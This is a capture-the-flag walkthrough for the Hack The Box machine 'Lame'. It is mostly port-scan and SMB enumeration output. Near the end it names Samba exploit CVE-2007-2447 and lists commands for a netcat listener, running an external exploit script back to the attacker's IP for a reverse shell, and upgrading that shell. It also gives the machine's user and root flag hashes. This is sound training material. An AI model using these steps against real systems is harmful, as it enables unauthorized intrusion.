Lame is an easy Linux machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.

Difficulty: Easy
OS: Linux

Official Link Machine: Hack The Box Lame

YouTube video for this machine: Terminal Troube - HTB Lame

rustscan –addresses “$TARGET” –top

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
0day was here ♥

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1073741716'.
Open 10.129.117.112:21
Open 10.129.117.112:22
Open 10.129.117.112:139
Open 10.129.117.112:445
Open 10.129.117.112:3632
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2024-12-16 22:07 CET
Initiating Ping Scan at 22:07
Scanning 10.129.117.112 [4 ports]
Completed Ping Scan at 22:07, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:07
Scanning lame.htb (10.129.117.112) [5 ports]
Discovered open port 21/tcp on 10.129.117.112
Discovered open port 22/tcp on 10.129.117.112
Discovered open port 3632/tcp on 10.129.117.112
Discovered open port 445/tcp on 10.129.117.112
Discovered open port 139/tcp on 10.129.117.112
Completed SYN Stealth Scan at 22:07, 0.07s elapsed (5 total ports)
Nmap scan report for lame.htb (10.129.117.112)
Host is up, received echo-reply ttl 63 (0.045s latency).
Scanned at 2024-12-16 22:07:33 CET for 0s

PORT     STATE SERVICE      REASON
21/tcp   open  ftp          syn-ack ttl 63
22/tcp   open  ssh          syn-ack ttl 63
139/tcp  open  netbios-ssn  syn-ack ttl 63
445/tcp  open  microsoft-ds syn-ack ttl 63
3632/tcp open  distccd      syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
           Raw packets sent: 9 (372B) | Rcvd: 6 (248B)

enum4linux-ng -A $TARGET

ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.129.117.112
[*] Username ......... ''
[*] Random Username .. 'hnriocui'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =======================================
|    Listener Scan on 10.129.117.112    |
 =======================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =============================================================
|    NetBIOS Names and Workgroup/Domain for 10.129.117.112    |
 =============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out

 ===========================================
|    SMB Dialect Check on 10.129.117.112    |
 ===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: true
  SMB 2.02: false
  SMB 2.1: false
  SMB 3.0: false
  SMB 3.1.1: false
Preferred dialect: SMB 1.0
SMB1 only: true
SMB signing required: false
[*] Enforcing legacy SMBv1 for further enumeration

 =============================================================
|    Domain Information via SMB session for 10.129.117.112    |
 =============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: LAME
NetBIOS domain name: ''
DNS domain: hackthebox.gr
FQDN: lame.hackthebox.gr
Derived membership: workgroup member
Derived domain: unknown

 ===========================================
|    RPC Session Check on 10.129.117.112    |
 ===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 =====================================================
|    Domain Information via RPC for 10.129.117.112    |
 =====================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member

 =================================================
|    OS Information via RPC for 10.129.117.112    |
 =================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix (Samba 3.0.20-Debian)
OS version: '4.9'
OS release: not supported
OS build: not supported
Native OS: Unix
Native LAN manager: Samba 3.0.20-Debian
Platform id: '500'
Server type: '0x9a03'
Server type string: Wk Sv PrQ Unx NT SNT lame server (Samba 3.0.20-Debian)

 =======================================
|    Users via RPC on 10.129.117.112    |
 =======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 35 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 35 user(s) via 'enumdomusers'
[+] After merging user results we have 35 user(s) total:
'1000':
  username: root
  name: root
  acb: '0x00000011'
  description: (null)
'1002':
  username: daemon
  name: daemon
  acb: '0x00000011'
  description: (null)
'1004':
  username: bin
  name: bin
  acb: '0x00000011'
  description: (null)
'1006':
  username: sys
  name: sys
  acb: '0x00000011'
  description: (null)
'1008':
  username: sync
  name: sync
  acb: '0x00000011'
  description: (null)
'1010':
  username: games
  name: games
  acb: '0x00000011'
  description: (null)
'1012':
  username: man
  name: man
  acb: '0x00000011'
  description: (null)
'1014':
  username: lp
  name: lp
  acb: '0x00000011'
  description: (null)
'1016':
  username: mail
  name: mail
  acb: '0x00000011'
  description: (null)
'1018':
  username: news
  name: news
  acb: '0x00000011'
  description: (null)
'1020':
  username: uucp
  name: uucp
  acb: '0x00000011'
  description: (null)
'1026':
  username: proxy
  name: proxy
  acb: '0x00000011'
  description: (null)
'1066':
  username: www-data
  name: www-data
  acb: '0x00000011'
  description: (null)
'1068':
  username: backup
  name: backup
  acb: '0x00000011'
  description: (null)
'1076':
  username: list
  name: Mailing List Manager
  acb: '0x00000011'
  description: (null)
'1078':
  username: irc
  name: ircd
  acb: '0x00000011'
  description: (null)
'1082':
  username: gnats
  name: Gnats Bug-Reporting System (admin)
  acb: '0x00000011'
  description: (null)
'1200':
  username: libuuid
  name: (null)
  acb: '0x00000011'
  description: (null)
'1202':
  username: dhcp
  name: (null)
  acb: '0x00000011'
  description: (null)
'1204':
  username: syslog
  name: (null)
  acb: '0x00000011'
  description: (null)
'1206':
  username: klog
  name: (null)
  acb: '0x00000011'
  description: (null)
'1208':
  username: sshd
  name: (null)
  acb: '0x00000011'
  description: (null)
'1210':
  username: bind
  name: (null)
  acb: '0x00000011'
  description: (null)
'1212':
  username: postfix
  name: (null)
  acb: '0x00000011'
  description: (null)
'1214':
  username: ftp
  name: (null)
  acb: '0x00000011'
  description: (null)
'1216':
  username: postgres
  name: PostgreSQL administrator,,,
  acb: '0x00000011'
  description: (null)
'1218':
  username: mysql
  name: MySQL Server,,,
  acb: '0x00000011'
  description: (null)
'1220':
  username: tomcat55
  name: (null)
  acb: '0x00000011'
  description: (null)
'1222':
  username: distccd
  name: (null)
  acb: '0x00000011'
  description: (null)
'1224':
  username: telnetd
  name: (null)
  acb: '0x00000011'
  description: (null)
'1226':
  username: proftpd
  name: (null)
  acb: '0x00000011'
  description: (null)
'3000':
  username: msfadmin
  name: msfadmin,,,
  acb: '0x00000010'
  description: (null)
'3002':
  username: user
  name: just a user,111,,
  acb: '0x00000010'
  description: (null)
'3004':
  username: service
  name: ',,,'
  acb: '0x00000011'
  description: (null)
'501':
  username: nobody
  name: nobody
  acb: '0x00000011'
  description: (null)

 ========================================
|    Groups via RPC on 10.129.117.112    |
 ========================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 1 hosts +                                                                                                                                                   X
 ========================================
|    Shares via RPC on 10.129.117.112    |
 ========================================
[*] Enumerating shares
[+] Found 5 share(s):
ADMIN$:
  comment: IPC Service (lame server (Samba 3.0.20-Debian))
  type: IPC
IPC$:
  comment: IPC Service (lame server (Samba 3.0.20-Debian))
  type: IPC
opt:
  comment: ''
  type: Disk
print$:
  comment: Printer Drivers
  type: Disk
tmp:
  comment: oh noes!
  type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share opt
[+] Mapping: DENIED, Listing: N/A
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share tmp
[+] Mapping: OK, Listing: OK

 ===========================================
|    Policies via RPC for 10.129.117.112    |
 ===========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: STATUS_ACCESS_DENIED

 ===========================================
|    Printers via RPC for 10.129.117.112    |
 ===========================================
[+] No printers returned (this is not an error)

Completed after 25.29 seconds

Found vulnerable samba version. CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc ‘Username’ map script’ Command Execution

Exploit - https://github.com/TerminalTrouble/CVE-2007-2447

Install python smb library
pip3 install pysmb

Start listener
rlwrap nc -lvnp 1337

Execute exploit
python3 exploit.py $IP 139 10.10.14.149 1337

Upgrade the shell to full tty
python -c 'import pty; pty.spawn("/bin/bash")'

Locate user flag

root@lame:/root# find /home/
find /home/
/home/
/home/service
/home/service/.profile
/home/service/.bashrc
/home/service/.bash_logout
/home/ftp
/home/makis
/home/makis/user.txt
/home/makis/.profile
/home/makis/.sudo_as_admin_successful
/home/makis/.bash_history
/home/makis/.bashrc
/home/makis/.bash_logout
/home/user
/home/user/.ssh
/home/user/.ssh/id_dsa.pub
/home/user/.ssh/id_dsa
/home/user/.profile
/home/user/.bash_history
/home/user/.bashrc
/home/user/.bash_logout

user - /home/makis/user.txt
4856f0131ec6755a26b1186dbf2dbb33

root - /root/root.txt
ed2b7155b71d373f2015df9e3c13c06e